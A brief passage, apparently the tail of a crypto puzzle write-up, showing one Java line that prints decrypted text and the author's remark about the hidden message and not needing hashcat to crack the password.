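System.out.println(new String(plaintext, "UTF-8"));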

After running this we get the output;

Ah – crypto girl left us a nice crypto-related message, essentially explaining what went on here. Fun stuff, and I'm definitely glad I didn't wait for hashcat to try to spit out that password.
